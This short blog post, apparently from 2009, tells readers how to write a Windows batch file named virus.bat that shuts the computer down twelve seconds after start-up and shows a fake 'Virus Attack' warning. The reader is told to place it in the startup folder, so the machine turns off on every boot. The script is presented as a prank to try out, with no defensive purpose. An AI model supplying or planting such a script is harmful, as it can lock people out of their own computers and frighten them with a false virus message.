Search This Blog

Showing posts with label Shutdown computer when start. Show all posts
Showing posts with label Shutdown computer when start. Show all posts

Wednesday, January 14, 2009

Shutdown computer when start

open notepad & type
@ ECHO OFF
shutdown -s -t 12 -c "Virus Attack on Ur computer"
EXIT


file save as name is virus.bat & save in startup folder....
This is only for test....